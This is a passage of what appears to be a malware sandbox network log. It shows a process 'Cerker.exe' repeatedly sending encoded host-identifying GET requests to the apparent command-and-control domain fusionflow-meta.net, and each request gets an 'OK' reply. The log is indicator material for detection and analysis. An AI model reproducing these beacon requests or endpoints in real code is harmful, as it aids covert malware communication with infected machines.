2024-08-31 20:44:34 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2Bx5p9FYdeNf3pO%2FAIh53nc1nsEREQ4nZKaXL23VOvwdq8eOHdVIbGcVA9pVj%2FHmOsJYaIDuFtyWeSBG%2BSqEvTGXZZMDtBFKqq%2FQ0ES%2Fc3Hpw4CEmvnjAlAl5flNnKS9iMvkmpSM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdbf80c475e7e-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:34 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	50041	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:34 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:35 UTC	698	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3pjIDzE%2B3%2FWKp%2F%2FKNPTjsS8spqKSE%2BZbJ5rWvFa8%2B3ttS%2BdXLB%2FJbU2a8ZmnD7qwXiXOunSAZKUIr5k607iWnspauUJlVBissIgV3c2GCLNxCAFKxlGyi3qBBmGiCivAVo%2FUsyN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdbff49a44239-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:35 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	50043	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:36 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:36 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y5YaxiqtDMI%2B8f228BX0ZdAuQNekoV0XlRfLDOpn5qGalHSguLoO%2BBM3Xv4f5xrce1DqqgpYj0qKYeNjAHHGtMpwNnp0AaBuBwlAUR0ZEUpFdBQXFcRtct4LkAKA5g6VjH27jBQh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc06991572b7-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:36 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	50044	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:37 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:37 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JWva657Sg%2FhHC3XuZsTkcjr%2BodB5VjkRONX%2BdGOR%2BLo0CqJ7YswtJTY5lkoiS8REV1wB1DLMwKOfDuPeFainwsRRwBTnYOjBrUDw7BXePBSZEns2sYzsjSvKEzKlmaq0xnj0zkoC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc0d4fc56a5c-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:37 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	50046	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:38 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:39 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x2hRQXxtotu6pgw%2B3t%2FtkWRB4NK0seX%2F8q08Vmp%2BHHl6FE52lXJtVFI%2FBMLudiAnfCtQcCm1rls64H9qNsDn2hzfXhJcQRiV2VKF3CaahQK7cDBq0hL863TWK5TzA5qNfvB1naxO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc14eb3242b8-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:39 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	50049	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:40 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:41 UTC	682	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p1P6BGQCzY4LePWzWkwdojEGcPNmzdhWsuVqVWBpUo2lfSK4hWKqcWC6kwoTTxMVWvNaSNSABvSK9z3D3vV1wlJYaK1EZboAyGrWzNG6SskvXEe%2BfrrB92UajsKqjpaDosP4NkxW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc228a7e6a55-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:41 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	50052	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:41 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:42 UTC	694	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z0AEOXMdh%2BziCt5JyzrMNPaRhkZHc%2FFUbqnvWjmDI7td%2F7%2BHFt6f6kt1J6cYgn%2B70NtJjMx2oQy0Nv06Ld%2BjTM%2B45Igu8ktb0hQXcXFUUOcu9jHhneZ75s4RVWj2wNZLnrrLEZGV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc2adab843d4-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:42 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	50055	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:43 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:44 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lesXe3hHPlx3r2vrNFj%2F1t69HHyHvaFFHe24ijai9V6DvHkZuIBC3wREbsV4hbwMzRYdS%2Bn%2Bv9DU6TJZGVBhmKLOVIxnCr8DTxJ16qJ3bl6TJQx%2FVfgVX88rKrPKEo7Kr8K74fpM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc339c3a7c8e-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:44 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	50057	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:44 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:45 UTC	694	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fCfsqIoA%2FGt85KV%2FgChEkU%2BSQPxPOuq6ohDoQWwpBxYZPWrlLYSDjnh6UMRhWTNOXCDRCHH9fIG3%2FZ2wq%2FR%2FGe3LYshXesEgjzejl4P%2FPRb0XPiXQuY3xEsAirkGmtUFRAb8Ngio"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc3bcb6818b1-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:45 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	50060	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:45 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:46 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CcXkktX0SS03vqyTL5bdw%2Bt70QFxbVMflYikJl1GRvg%2By7ocCT1XxR3j6kjx3taApKCD6QX04gmggbRsSiQphtJwizfsmCNwi%2BMpDSTOruglCerQ1phDtXs9M5LASpfIpudjc31s"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc428ba40cb1-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:46 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	50062	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:47 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:47 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ZLMLPbf9hFpz%2FQ7JrsSfcA6yf4ZknFIYXuGQkkClYNarM4702NYlMXXaqM8sx3T%2FiBUyULalDZnvAodnbW%2BDBO3ty8FG9lpVvXe87JjCNMIi29YKe%2BgtzQm3FHDuhIqt5ra9jrW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc4b4f595e74-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:47 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	50064	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:48 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:48 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oUwREzwPGvXHY7U51a7qfLWy2rG%2FnIilfhvPmfJXfs8BoVxj6CfU0gnerzRuP4QWjAcvsGEJJVwzkDsAbyXJHs2mQ8rZICva%2B%2B3d2xuN%2BZ7Fqv8IMlIwQOAl6rAHRuSM7WcP%2F1q5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc528efc41b4-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:48 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	50067	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:49 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:50 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x3q7vBu5yiIOuzlYPVabHNQ0R5Ibp%2Ffw7tWzF8oWi6rbBwGSUBP4N6QPv2uXRIplDo3C0UHl1G5lqRbjXI187bnIJwO4Kq%2BM6RW%2F2OHD6gUSQBzp3Mof4O82Spxlr8XEEqeWKvyO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc596bf82365-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:50 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	50068	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:50 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:51 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YymtzkS6f70Obtks9toFCU%2Fb2npZdLSOL9eHQrPe1xTdxodmvzJ3JznK4XwHQyOqQggljHOSzBXh0eM1eUAtSwZol%2FKt9NursTkW%2FeX4NgssIWW29LnyOIhEDkp0nLCY0229Qbtn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc60981d179d-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:51 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	50070	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:52 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:53 UTC	694	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h0wBJamV%2B0N%2Frw%2FF6iShpndhiNJysoVFF5gxk%2FYXriMLI1I9oauCWH79iup9OeDXNO3DoTFDvmJAWDIZImjQ9Py%2FJXbN%2FWOfobzZKo%2B03tXprk2sP0r5zx3eAvdiV6FdNDBP8n8m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc6f7ab61a44-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:53 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	50073	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:54 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:54 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=We46Axoek8uUoXpzAOWbHKzO2kpQyfF25tlYKK2AaBU5OJGbB0YTv6cemXcB6jPPm%2Fz%2BJmkPmKdUSOcliHD9fMRsmW23%2FJJlgC0j458%2FjCjQUQW8jkoifOCXkPBaQ30Lyda%2FKDWL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdc77aa647cb1-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:54 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	50075	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
